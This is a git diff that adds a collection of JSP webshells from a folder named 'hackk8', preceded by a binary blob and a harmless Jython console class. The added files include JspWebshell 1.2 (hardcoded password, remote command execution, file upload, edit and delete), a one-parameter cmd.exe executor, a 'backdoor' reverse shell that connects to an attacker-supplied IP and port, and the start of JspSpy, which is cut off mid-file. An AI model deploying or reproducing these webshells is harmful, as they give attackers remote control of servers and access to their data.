zidj{8HsTy_w8ktI`-0g%YK(o?+4wK9$kf9ms$H=?7tz@SNjW6OSq^TWJwu$)q_Thk zL?*Fq&?3YFzQTCRD@4(8y(CfQq+x;%5E(m3TiVUsSCQ>a%oVgw6KADv0qsQ ztlTS$%~7n@8(arl$m30mS!GOiL69rnCCJp!i>{lD+u~5UGVF8jUKs`CMG`{>*4xvg=_OAT)|i za{c8L^RVGZPl9-ZkZH~(Z_TCAOFSSjA}i3rs3d#+TFR6k-}A7h3;P?ntK`M%R+y#8 zG*D5V>46j(P%ikd`AY1VVeH_t#qO*TX8ol~{HT)VfsVydY=+?0#c7<4R7Pm`f5W9n z_N*N7LiFuWn+tO_6N*T~XEc%6Eow`MINzBD%GvI~PEpr%ds{XVWf-d=sOXli$ny?^ zft>ahB_{BwBeAKqXRqr#mnZQ z$*cp?WpYiD)}re#Yb=mAz-n9`&(uLPQW!#@W?mtw2$dRTU;~sz4B5S0eMq5%Sx1?n zs%I1|-^>YV{cbtKQZDG5jq9P;I5bUSHcN~pBWv>TLn5REB`@u-Rl%Fqp+47x%2NSp zi$+ZLsv`XGyyuo3a<`avf1#Sam8nI2j12AhR^af|We4(#WlA z4A&rhU!ytcOy3?%_oTiZP8~)LlLuI%Z1`L9*mqN}#dok{Y}8vGA4_;IeHG#|6nACS zkw~5twXfwnR0>L`(1M@r<3N?8#ZpP3&=>k`^Is%#%iCNRcvD%Q4~5Q_ObNs1ciA7q z_oeXkUysC#c$Pq+^}|H5%Pnp%cvF8l$e#c5?Qwq%02BH(SI3 zaHSd{PDCsHPK7WoRD;2OMG`!Lru}{LSm>-8HEvrY;7jrZ_=6fV-l}dK&!MIGs`f4k zN;wh2i3Dp^QsUWZ_>UT+M43Z91C^reGLUIO0M}M!HU+T{)f<oF87$3XFV@A9s;nfRSZ3?9~uAlW0-dsJ8 z2zyQu_r9M^kZKP60ctqRI6YC$=;$wm@Tc6FL}om z`{3p5dy6tyM$n{^;>kP56q zzTGTt;6L4c@&AIm|Fiyozw*DpwM8wgP5y253m&7h{l`#ODy{IsWIwOT*HEoegeJiO z-RBqtY1ACldR=H_U!0vgBoU5=UOfnsXyKA~5}T0<{Q9Z?ESkqa45na*-?LFAF`b^* zjm|NzZC(|b$gUnQni6%|7Z@G`8LdQ;kNd1%>3oL|+cGK( zN?H@me2GUj7!at>qG+mo^y+R%wabbmU`>AF)2^!+yvijrXLaTu^fOrc$zTp_x?mb# zOy)Q(W}bL_$Rcw{xP_9qglp_E2%>8Iqw1W(qiG(-lKa6Z6Y40`2E3}O2 znkcp-A7x3TOdz}U_g2LOHmpcPaYllyMMkkw%U7t9F{g+0D#MJ-5)f>6*z#k>Hq379 zvRjcOkufeF@fls`(X2Fg0^Hn^^h1ru!{O9rss{<3!czn4I`1!pRlkj7njNh=yp5U! zL2j-5v)oz_!*_1$NruDl&TdRqrTJIeBdm7Pt465hw?XC1Zjv|a&YS>}CmxpwFfUae zF3XAwSkY_VCkmP+=)qIJT89fjl4l71HoeHsRIo&Tvu@al@#LAB!0zYl+)~1Zy0Rl5 zHET-PBI)B_7sZd7tG+(v5DQ$Yg$HunK!tt9mFlCNF1L#Sr`)>Bt-;~Rw2MbEX$*q8 zTis>J77$S%KHgigV~BHS(;??Y?$xnYyhJqZd@6a41 z51d@PHT{0(IDLR0d(~qWoPU@1tmdJ806d!sbBDYw@;$yHMd?v;QzJ{x1f1DW3Jxou zG3AvjXPMV%|AW|4aQKJ#5fGh?AFrvajDA~!ftqI7(d%>$XA$DBdOBcoj1y*Ig_M`xza}L7L#)D;F|myVem5uPA-Yl zRX^HR;^b0=<8SnE6Dcd1#vAWOqdnnZp~8iwhvu1EaqDq|zQ*<*B z8VTZq?bgSbZjrzPcBe{a_A2_svd4)0res(|cc|AhMJKk?$oi1R%Z@D%nqIuL{xnPQ zabR$PUV=ekm;uN{QxpgCg=edZ7QnISo7-ZOrBJsD)|84^u8YB+E>!)Kw|80=+#-9( zf>3Vauy3X+0zt`%COlEet6*&ezpLs~e#14>jkSb~K1C-rYnhk6A?$~jDj6fl^SgSI zY%D2_?SN>HI?8@l4de{S?g<-xj#lyzUC^^U?;)ROsuZ2b#b^!FVlHWj;I(Un+xEifCaTU|Q3- z?8~h99S&7Df1fQ-%9gwEjx;5)>W8}#Aj~3M8lKgdNQ5670~gdT+VCj9<-Kb>L}IUb zp}vc7!6y0W`5ZSc#{QA5m@26#(#t`aFT3Z@Nnx)YI$s4N0JQ1uD{8}}2vg_?s3TmT z5Q2S;udq{wM>?p!LV&oFCRWb_x(&5KN{>IVr?5`Mwle0Z_>S{}9yc{Q@!uF$y0B$R zv>Iuvn8kG*NoEhb8%-OEsigCuScfaBdKLdq5Qn{Zb()guswq9Lz>#75%SiZLgi ze8pPtpeKiE#JFgDp7m-vB~HUWW!6eju*tcN{wXL1O4F%Y`ty?keyMi^=nKRGjcP}u zne!aru!eA569S+w z_Xpml2Xhm=%z0%o)Ro*OJ{2TkgpB#iG!d~!Z-`N5JC9agulK;gv%BEaU+&)OaW&)4kYzUQg33=rgy@s~Le#jZY^@m}$`}4kc?UODbKY6;&XD8bQI}g?T z%k^JL%*4XfSH#%NON_+xB<0G$do{z#75l>vh6*Grfhe_ok^XE8U#0!N8YX`gQPNYR z>sHWFN>b$uj?ox!y-d0S8P{8Wpw2Ofe^P&geYhTIE>5bioM;=H{UncxCn;~je8 z66o)!L(OQE+6pq}Y}KMka1#j&&Qb*j1uZ5fkMgmpDB~}jHoCtb1Pj&S+-$T1espzV zfiksGqna7VGy^1kq|}s$lyefk&5Ka_5R~ zyjqTHsJBb5k9IHFnAIA0Q09@@qDZS2ob&tKr$dFxidca*dU1Wh&rx7?p&Dd85y&Q< zh3L^}LII53+4uz?IzdijtPVMWkVtbqn@M-I2*5M2fZX_)8xttAV!Le8*US5wHOL!@ z_0cU2TPlrAi^*nE{{q3L%WH!Z&M@@oa*lfFRXSD~97pXF#RYGhGZh!uv>gKZ74Mmu zE1*(IhW*wZJ4oqZkqC7Nd@a$hsV<##k4`{FnGc_2`-6RZa`ky{E2Y&3YCx>-2h&3S zjW)aowxX9#AIWXi6(nwNsns;e{=D!O?+Br5P8!5)Z>_sCg5H_+TlKUB*(}}(AfwDb zgn61-P0dAnvyh%Wp8g~;Hp_3~#i+Zlnu1!c!5F&H`qd!$-y@#!J3k`O0wD5d3RwIf zqx|v3=C}V8ffD~eh(M=*t3aV+bj|-zfidI7Cd(JXI_dlBaWYJ_duP zd-m4gg;{ARJzwo7zldbsoiINRkZ(vNzq{8KJqYp6Ro2{MX5uT3>ruCoWV=f+8aj;$ zv=eE!*-lAWZY#!Wti<8p%bhw5o7Ct2&Xq#DBeO9?Nkqpl&ZY?2HEXglm>(-bbDQH# zJd?}eg1-8hldiILqR znrNs!xKeoBVNXNq#I@Q2W$FF>FstnGHod&xRgemMm&zXW61twlFR!{rfECgxV)oN= zy$hqJu!cf3|At>*Wu|tV$3jn26l)Dz@;1M`Zoh)!NyzO)*so?LG|z+W564g$z?Dnx z;6MVLP}9@=-}dT7iF`Sp$f_PVpa}Buuk)PL>IiorhtmrfR`5zvV>kFb=u|!oI`Zt1 zz7DA{B-C;m!$C@W)8ljT{nkz}8VI7fRclWvJU$vAK%2AzhW~BEpfjt`|>v0Y85} z1LrczgtUO~EU4bp5PkL;<=Ni}A4|xH53PLH+0DJH4tBn46CeP6+TfmepMzxfioBIz z-xt7db5A!MNZn$H&s=Ta#MI>?m_*&a6WP4gR~d3@d@iwt2;Ips&qXf+Jm+Xsm&lNH zgy}-a&!0K<20o%~@i;4;2l7)eiSY9FSf+16v-~Pv_bmw+*C&I&88v1m`!E)DIM9xR zUe3Uj9x&Qm@;=5mIf=c31x%JcYu&_8Yp|o$8tGZq>xC=i?KzV0m(?pJl4&e^wW-?g z!Em#C>i=DNAIT$SeqKt*rMR@~jA#o_m_-oxYvJFVueu**duoGh$r{X0(G)^3_XuK zpRC%cO{#d?25rv@ZU&He|5c}t$#LfAqMimnJO@wx-ABgCXxGZ%Gb;dTn9q|Q4FXlrdnnjy<`t`*nPShu zM@^T+A#X~n;HtuIih&dN0?d`5j4$eW^&DC<9rywwfq$wjZ>@mmY?5dBLTWv>rP%ld z7Q86|>TtE`%QWsa)F)xwzmAATfGOhVJ2Zcum>PxO(sE{`Q!8;!+}5{^exwT0zMp-2 z^>Ur~IyY7Ry8zIamoKMCXYBEX)in#7Or0G3ye8|J(!@p}@m1S70_lUUP0<$zz4z}n z_C)q=@`G2SB*O9+hq7T+Uz^9uxW<**4ark6-w2SWbxyUNek9@-Q33LvCpXIRQSU!(ry3J1|fu3buj#)1M2i zT%(w?R5Gm~KcEcbGt_Nj%*R zPZfw)A$+6_B?^j92To^S#Y7{pv@|kDW0y}uvJsYs;}+Vq@)olPD5B5W>K8AIy}R3v zi;8pQSU6N-s}}8Kb^V6DIuLt7%?8VYgO?od?;>@9Vd8x~TJ{5s^@r@UoBBnJ(vdo{ z&es6~kTjkchf*?}!}0f0BD+!-WfXR{f!}(RDB~T}I~^bzy_H9}?xFBFxXbaoiX7rB z_g^H}F0w{bjS9nxu1GM4{+5iC=G9U4S5yC2dv_WQ# zmy&X=9g<9TDJNyQh|5R_X>ha5*k?wT!9>P3wy|F_WXsaX)^s!6hkLvCo_n18=Jw{E z^SpS@dEPwF`Jey!{+~C`@ALbOqhyG^odf~t8CIVWCxm8nD)tPldKK2S8e1BuZi_%P zN(gSBO~8I~smnEoMc5pAq53#FB!6^Dfx881=K`&_*0~Wrgv|+H#@)$w@QQ=v`{{BG zo!BXk$fcwdLTx1_)G-M?=>>YR51$yx*sYIqj$TN4$u%@tdihE0yfJ^;N!N>(E6+7Q zba$*w`>CA}$!ufH=EmLPV4Lrwq~3eeh{4JIgrJHfM~UClA`?>;cBr8pR4Q`n9B(*% zJ!6Ia(w`^Y=?rkvef9$!mjCgj?}s|fK-2-E4iI&Kr~^bDAnE{72Z%aA)B&On5Osj4 z14JDl>Htv(h&n*j0iq5Nb%3Y?L>(aN08s~sIzZF`q7D#sfT#mR9U$uXMyNvw0sQd} zW|#!bL?k0n+hPiV8vkC~a^>6o@iq!}b%*5|GPt^CN!)iQr9$`lz?%5v0?n<)~aM*h+w&M()NePt#vjc%W%_(rw0D_b@$ z)H0baSHEsARh6lYNIC2ua5%(zE@9zwmcXd?A-9w^$4*B?__~f#)HK9G>uglqFbhMX zjf$S=G5$GMr%EnTa>I9zr%XIpZK=AlgK9>V3c}SoTmo=(&{aWaHUD8AN?449cbZ8w z{H=w3LhRt&SPis6bZ6NNsJHh;m7AQMuykcIuBK21Y%-_TWKAPJ4x+y{FD@_wHr9jz z1vJ!twp%o`=%uR0{-_Y>`78C$jg^=GYj%pfysx{noA=jYC}O~LkF8IWsF;IoYq7H< zM(f?7SY@9T{&r@en6eVBv5(Uw7?)x)w}xRYgBc|G8a+cQv7KTq8p7%>@{CTO96DXo z5wXKGcka^t7rgwErPB^##^o8s5msJ!RB$vaF|&*@>=1T6-Wqq@PsD3EhG5~j&90QQX--Co{FqbG_k-nyF^u- zZ=Fyqml>~EI$GL{34L9^#_f74>pLPR+jQ#~_a#W<7z%6Z*N>=dhV&8}@~H z$Bp;q3hRd9Ba8I4;gK`i_7hBjGz{IsK-W#^xTms&pM^>Sxo4!?BH)74vm%&EJ~NSc zG9D#$?0~5QOrxMfPKetxX{TG@vYYjtAFgkRac+y7=NvfGD0{_` z1$`qD-b|2n;Mbg`+@6cGO02F=f&M8-<)FLoT4bTfgiakaa~{RbkC6(qAaHk@yo_0j z?zMTaU^vT*zaePE8_#+zFAa&#gT1Ku;)`n2^?m&Y zWNL4J4app68NGXl%pu}h7u)d-MO8V-oQ`)@1?|}G!LFjgPr2yb_qNjs4H#Z{FMG`UAbNeM@JwOKXTNXbRljNvG_x_093yK5)=%dyQJ_`1G<>5Ac8bnVZCA`-2w kyJfoL3wF2)-%cFptEk1|vCX@y;b7Z$na$@zcdKH51K2vZnE(I) literal 0 HcmV?d00001 diff --git a/jsp/hackk8/JSP/Java Shell.jsp b/jsp/hackk8/JSP/Java Shell.jsp new file mode 100644 index 0000000..f15e864 --- /dev/null +++ b/jsp/hackk8/JSP/Java Shell.jsp @@ -0,0 +1,125 @@ +package enigma.shells.jython; + +import java.io.*; +import java.awt.*; +import javax.swing.*; + +import enigma.console.*; +import enigma.console.java2d.*; + +import org.python.core.*; +import org.python.util.*; + +public class JythonShell extends JPanel implements Runnable { + public static int DEFAULT_ROWS = 20; + public static int DEFAULT_COLUMNS = 80; + public static int DEFAULT_SCROLLBACK = 100; + + public PrintStream out; + + public Console console; + public Java2DTextWindow text; + public JScrollPane scrollPane; + public PythonInterpreter interp; + + private Color colorBackground = new Color(0, 0, 0); + private Color colorForeground = new Color(187, 187, 187); + private Color colorError = new Color(187, 0, 0); + private Color colorCursor = new Color(187, 187, 0); + + public JythonShell() { + this(null, Py.getSystemState()); + } + + public JythonShell(PyObject dict) { + this(dict, Py.getSystemState()); + } + + public JythonShell(int columns, int rows, int scrollback) { + this(null, Py.getSystemState(), columns, rows, scrollback); + } + + public JythonShell(PyObject dict, PySystemState systemState) { + this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK); + } + + public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) { + super(new BorderLayout()); + + text = new Java2DTextWindow(columns, rows, scrollback); + text.setBackground(colorBackground); + + scrollPane = new JScrollPane(); + scrollPane.setViewportView(text); + + add(scrollPane, BorderLayout.CENTER); + + console = new DefaultConsoleImpl(text); + out = console.getOutputStream(); + + interp = new PythonInterpreter(dict, systemState); + interp.setOut(out); + interp.setErr(out); + } + + public void run() { + int pos = 0; + int tbs = 4; + + String line = ""; + String command = ""; + + for (;;) { + String space = ""; + for (int i = 0; i < pos * tbs; i++) { + space += " "; + } + + try { + console.setTextAttributes(new TextAttributes(colorCursor)); + + if (pos > 0) { + out.print(space + "... "); + } else { + out.print(">> "); + } + + console.setTextAttributes(new TextAttributes(colorForeground)); + + line = console.readLine().trim(); + if (line.length() == 0 && pos > 0) { + pos--; + } else if (line.endsWith(":")) { + command += space + line + "\n"; + pos++; + } else { + command += space + line + "\n"; + } + + if (pos == 0) { + interp.exec(command); + command = ""; + } + } catch (Exception e) { + console.setTextAttributes(new TextAttributes(colorError)); + + e.printStackTrace(); + command = ""; + } + } + } + + public static void main(String[] argv) { + PySystemState.initialize(System.getProperties(), null, argv); + + JFrame frame = new JFrame("Jython Console"); + JythonShell console = new JythonShell(); + + frame.add(console, BorderLayout.CENTER); + frame.pack(); + frame.setVisible(true); + frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + + console.run(); + } +} \ No newline at end of file diff --git a/jsp/hackk8/JSP/JspWebshell 1.2.jsp b/jsp/hackk8/JSP/JspWebshell 1.2.jsp new file mode 100644 index 0000000..4ce0fcf --- /dev/null +++ b/jsp/hackk8/JSP/JspWebshell 1.2.jsp @@ -0,0 +1,788 @@ +<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %> +<% +/** + *

Title:JspWebshell

+ * + *

Description: jspվ

+ * + *

Copyright:[B.C.T] Copyright (c) 2006

+ * + *

Company: zero.cnbct.org

+ * PS:СܴȤдϵQQ:48124012 + * @version 1.2 + */ + String path=""; + String selfName=""; + boolean copyfinish=false; +%> +<% selfName=request.getRequestURI(); + // String editfile=""; + String editfile=request.getParameter("editfile"); + if (editfile!=null) + {editfile=new String(editfile.getBytes("ISO8859_1")); + } + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); +%> +<%! + String _password ="111";// + public String readAllFile(String filePathName) throws IOException + { + FileReader fr = new FileReader(filePathName); + int count = fr.read(); + String res=""; + while(count != -1) + { + //System.out.print((char)count); + res=res+(char)count; + count = fr.read(); + if(count == 13) + { + fr.skip(1); + } + } + fr.close(); + return res; + } +public void writeFile(String filePathName,String args) throws IOException +{ +FileWriter fw = new FileWriter(filePathName); +PrintWriter out=new PrintWriter(fw); +out.write(args); +out.println(); +out.flush(); +fw.close(); +out.close(); +} +public boolean createFile(String filePathName) throws IOException +{ +boolean result = false; +File file = new File(filePathName); +if(file.exists()) +{ +System.out.println("ļѾڣ"); +} +else +{ +file.createNewFile(); +result = true; +System.out.println("ļѾ"); +} +return result; +} +public boolean createFolder(String fileFolderName) +{ +boolean result = false; +try +{ +File file = new File(fileFolderName); +if(file.exists()) +{ +//file.delete(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +else +{ +file.mkdir(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; +System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} + +public boolean DeleteFolder(String filefolderName) +{ +boolean result = false; +try +{ +File file = new File(filefolderName); +if(file.exists()) +{ +file.delete(); +System.out.println("Ŀ¼ɾ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; +System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
"); + + return str; +} + public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "\"" + cmd + "\""; + } finally { + return retStr; + } + } + public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} +class EnvServlet +{ + public long timeUse=0; + public Hashtable htParam=new Hashtable(); + private Hashtable htShowMsg=new Hashtable(); + public void setHashtable() + { + Properties me=System.getProperties(); + Enumeration em=me.propertyNames(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=me.getProperty(strKey); + htParam.put(strKey,strValue); + } + } + public void getHashtable(String strQuery) + { + Enumeration em=htParam.keys(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=new String(); + if(strKey.indexOf(strQuery,0)>=0) + { + strValue=(String)htParam.get(strKey); + htShowMsg.put(strKey,strValue); + } + } + } + public String queryHashtable(String strKey) + { + strKey=(String)htParam.get(strKey); + return strKey; + } +/* public long test_int() + { + long timeStart = System.currentTimeMillis(); + int i=0; + while(i<3000000)i++; + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + } + public long test_sqrt() + { + long timeStart = System.currentTimeMillis(); + int i=0; + double db=(double)new Random().nextInt(1000); + while(i<200000){db=Math.sqrt(db);i++;} + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + }*/ +} +%> +<% + EnvServlet env=new EnvServlet(); + env.setHashtable(); + //String action=new String(" "); + //String act=new String("action"); + //if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act); +%> + + + + +JspWebShell By + + + + +<% +//session.setMaxInactiveInterval(_sessionOutTime * 60); +String password=request.getParameter("password"); +if (password == null && session.getAttribute("password") == null) { + +%> + +
+
+ + + +
+ + + + + + + + + +
 8JspWebShell + version 1.2¼ :::...Power By +
+ + +
+ +<% + + } else { + + if (session.getAttribute("password") == null) { + + if (validate(password) == false) { + out.println("
    • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } +%> + <% + File tmpFile = null; + String delfile=""; + String delfile1=""; + String editpath=""; + delfile1=request.getParameter("delfile"); + editpath=request.getParameter("filepath"); + if (delfile1!=null) + {delfile=new String(delfile1.getBytes("ISO8859_1")); + } + if ( delfile1!= null) { + // out.print(delfile); + tmpFile = new File(delfile); + if (! tmpFile.delete()) { + out.print( "ɾʧ
    \n"); + } + } +%> + <%String editfilecontent=null; + String editfilecontent1=request.getParameter("content"); + // out.println(editfilecontent1); + //String save=request.getParameter("save"); + if (editfilecontent1!=null) + {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));} + // out.print(editfile); + //out.print(editfilecontent); + if (editfile!=null&editfilecontent!=null) + {try {writeFile(editfile,editfilecontent);} + catch (Exception e) {out.print("дʧ");} + out.print("дɹ"); + } + %> +<%request.setCharacterEncoding("GBK");%> +<%//String editfile=request.getParameter("editfile"); +//out.print(editfile); +if (request.getParameter("jsptz")!=null) +{%> +
    +
    + + + + + + + +
    ز +
    +
    + + + + + + + +
    JAVAز +
    +
    +
    +
    + +<%} +else{ +if (editfile!=null)//if edit +{ +%> +
    + + + + +
    +

    ַ + +

    +

    + + +

    +
    +

     

    +<%} +else{%> + + + + + + + + + + + + <%=path1%>" ENCTYPE="multipart/form-data"> + + + + + + <% String fileexe=""; + String dir=""; + String deldir=""; + String scrfile=""; + String dstfile=""; + fileexe=request.getParameter("fileexe"); + dir=request.getParameter("dir"); + deldir=request.getParameter("deldir"); + scrfile=request.getParameter("scrfile"); + dstfile=request.getParameter("dstfile"); + if (fileexe!=null) + { + //out.print(path+fileexe); + createFile(path+fileexe); + } + if (dir!=null) + { + //out.print(path+dir); + createFolder(path+dir); + } + if (deldir!=null) + { + //out.print(deldir); + DeleteFolder(deldir); + } + if (scrfile!=null&dstfile!=null) + { + //out.print(scrfile); + //out.print(dstfile); + copyfinish=fileCopy(scrfile, dstfile) ; + } + %> + + + + + + <%//ϴ + String tempfilename=""; + String up=request.getParameter("up"); + // String tempfilepath=request.getParameter("filepath"); + // out.print(tempfilepath); + if(up!=null) + { + tempfilename=(String)session.getId(); + //String tempfilename=request.getParameter("file"); + File f1=new File(tempfilepath,tempfilename); + int n; + try + { + InputStream in=request.getInputStream(); + BufferedInputStream my_in=new BufferedInputStream(in); + FileOutputStream fout=new FileOutputStream(f1); + BufferedOutputStream my_out=new BufferedOutputStream(fout); + byte[] b=new byte[10000]; + while((n=my_in.read(b))!=-1) + { + my_out.write(b,0,n); + } + my_out.flush(); + my_out.close(); + fout.close(); + my_in.close(); + in.close(); + // out.print("ļɹ!
    "); + } + catch(IOException e) + { + out.print("ļʧ!"); + } + + try + { + RandomAccessFile random1=new RandomAccessFile(f1,"r"); + random1.readLine(); + String filename=random1.readLine(); + byte[] b=filename.getBytes("ISO-8859-1"); + filename=new String(b); + int pointer=filename.lastIndexOf('\\'); + filename=filename.substring(pointer+1,filename.length()-1); + File f2=new File(tempfilepath,filename); + RandomAccessFile random2=new RandomAccessFile(f2,"rw"); + random1.seek(0); + for(int i=1; i<=4; i++) + { + String tempstr=random1.readLine(); + } + long startPoint=random1.getFilePointer(); + random1.seek(random1.length()); + long mark=random1.getFilePointer(); + int j=0; + long endPoint=0; + while((mark>=0)&&(j<=5)) + { + mark--; + random1.seek(mark); + n=random1.readByte(); + if(n=='\n') + + { + j++; + endPoint=random1.getFilePointer(); + } + } + long length=endPoint-startPoint+1; + int order=(int)(length/10000); + int left=(int)(length%10000); + byte[] c=new byte[10000]; + random1.seek(startPoint); + for(int i=0; i + + + + +
    JspWebShell + version 1.0(վĿ¼:<%=config.getServletContext().getRealPath("/")%>)
    + <% + File[] fs = File.listRoots(); + for (int i = 0; i < fs.length; i++){ + %> + ش(<%=fs[i].getPath()%>) + + <%}%> +
    +
    + + +
    +

    + <% + String cmd = ""; + InputStream ins = null; + String result = ""; + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command");result = exeCmd(cmd);%> + <%=result == "" ? " " : result%> + <%}%> +

    + JSP̽
    + ļ + + +
    + ļ + + +
    + ļ + Ƶ + + +
    <%if(copyfinish==true) out.print("Ƴɹ");%>
    + <% try { + //path=request.getParameter("path"); + //if(path==null) + //path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%>     ɾ
    + <% } + + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +       		+ <% try { + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%> + <%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">༭ +   ɾ
    + <% } + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +
    +

    Power By [B.C.T] QQ:48124012

    +

     

    +<%}//if edit +} +} +%> + + \ No newline at end of file diff --git a/jsp/hackk8/JSP/cmdjsp.jsp b/jsp/hackk8/JSP/cmdjsp.jsp new file mode 100644 index 0000000..2bd63ba --- /dev/null +++ b/jsp/hackk8/JSP/cmdjsp.jsp @@ -0,0 +1,31 @@ +// note that linux = cmd and windows = "cmd.exe /c + cmd" + +
    + + +
    + +<%@ page import="java.io.*" %> +<% + String cmd = request.getParameter("cmd"); + String output = ""; + + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); + BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { + output += s; + } + } + catch(IOException e) { + e.printStackTrace(); + } + } +%> + +
    +<%=output %>
+
    + diff --git a/jsp/hackk8/JSP/jsp-reverse.jsp b/jsp/hackk8/JSP/jsp-reverse.jsp new file mode 100644 index 0000000..6ce64c9 --- /dev/null +++ b/jsp/hackk8/JSP/jsp-reverse.jsp @@ -0,0 +1,90 @@ +// backdoor.jsp + + +<%@ +page import="java.lang.*, java.util.*, java.io.*, java.net.*" +% > +<%! +static class StreamConnector extends Thread +{ + InputStream is; + OutputStream os; + + StreamConnector(InputStream is, OutputStream os) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader isr = null; + BufferedWriter osw = null; + + try + { + isr = new BufferedReader(new InputStreamReader(is)); + osw = new BufferedWriter(new OutputStreamWriter(os)); + + char buffer[] = new char[8192]; + int lenRead; + + while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) + { + osw.write(buffer, 0, lenRead); + osw.flush(); + } + } + catch (Exception ioe) + + try + { + if(isr != null) isr.close(); + if(osw != null) osw.close(); + } + catch (Exception ioe) + } +} +%> + +

    JSP Backdoor Reverse Shell

    + +
    +IP Address + +Port + + +
    +

    +

    + +<% +String ipAddress = request.getParameter("ipaddress"); +String ipPort = request.getParameter("port"); + +if(ipAddress != null && ipPort != null) +{ + Socket sock = null; + try + { + sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); + + Runtime rt = Runtime.getRuntime(); + Process proc = rt.exec("cmd.exe"); + + StreamConnector outputConnector = + new StreamConnector(proc.getInputStream(), + sock.getOutputStream()); + + StreamConnector inputConnector = + new StreamConnector(sock.getInputStream(), + proc.getOutputStream()); + + outputConnector.start(); + inputConnector.start(); + } + catch(Exception e) +} +%> + diff --git a/jsp/hackk8/JSP/jspspy有屏幕.txt b/jsp/hackk8/JSP/jspspy有屏幕.txt new file mode 100644 index 0000000..570d090 --- /dev/null +++ b/jsp/hackk8/JSP/jspspy有屏幕.txt @@ -0,0 +1,2326 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** + +*/ +private static final String PW = "k8team"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { 